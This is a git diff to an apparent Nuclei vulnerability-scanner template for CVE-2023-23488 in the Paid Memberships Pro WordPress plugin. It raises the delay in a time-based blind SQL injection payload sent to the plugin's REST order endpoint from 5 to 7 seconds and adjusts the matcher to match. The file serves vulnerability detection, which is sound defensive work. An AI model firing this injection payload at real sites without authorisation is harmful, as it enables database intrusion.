diff --git a/http/cves/2023/CVE-2023-23488.yaml b/http/cves/2023/CVE-2023-23488.yaml index 0fef23c1f4..7224e9484f 100644 --- a/http/cves/2023/CVE-2023-23488.yaml +++ b/http/cves/2023/CVE-2023-23488.yaml @@ -36,7 +36,7 @@ http: - raw: - | @timeout: 30s - GET /?rest_route=/pmpro/v1/order&code=a%27%20OR%20(SELECT%201%20FROM%20(SELECT(SLEEP(5)))a)--%20- HTTP/1.1 + GET /?rest_route=/pmpro/v1/order&code=a%27%20OR%20(SELECT%201%20FROM%20(SELECT(SLEEP(7)))a)--%20- HTTP/1.1 Host: {{Hostname}} - | GET /wp-content/plugins/paid-memberships-pro/js/updates.js HTTP/1.1 @@ -45,8 +45,8 @@ http: matchers: - type: dsl dsl: - - duration_1>=5 + - duration_1>=7 - status_code_1 != 403 # Wordfence - contains(body_2, "pmpro_updates") condition: and -# digest: 490a0046304402201f4e8222f27c1dc7be25568f55e8568fcc825b89bf0a50617616b52ef90ba78c022012551c1be76c97967a28849e30afbc19cad34dbad947f6cc225b5b6c42cfd8d3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402201f4e8222f27c1dc7be25568f55e8568fcc825b89bf0a50617616b52ef90ba78c022012551c1be76c97967a28849e30afbc19cad34dbad947f6cc225b5b6c42cfd8d3:922c64590222798bb761d5b6d8e72950